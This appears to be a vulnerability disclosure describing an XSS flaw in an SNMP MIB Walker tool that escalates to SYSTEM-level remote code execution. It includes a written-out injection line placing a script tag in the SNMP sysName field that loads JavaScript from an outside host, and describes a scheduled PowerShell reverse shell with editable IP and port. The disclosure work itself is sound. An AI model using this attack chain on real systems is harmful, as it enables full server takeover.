Improper validation of strings from SNMP devices when using the SNMP MIB Walker, makes the application prone to a reflected XXS attack.
Steps To Reproduce:
Modify script below to run revshell. You can de-base my payload and change IP and port, then base64 encode again and put it in script. Or run another payload of course.
Save the script on a webserver
Add XSS pointing at url of script in SNMPD config, I placed it in sysName:
sysContact Me <email@example.com>
sysName LinuxPC<script src='https://f20.be/t.js'/>
Open the SNMP MIB Walker tool and "walk" the IP address of the Linux computer
Function of script
It will make an powershell-task, containing reverse shell in this example
Trigger the task to run every five minutes
The attacker will have Remote Code Execution as the "NT System" account.
Full control of the server.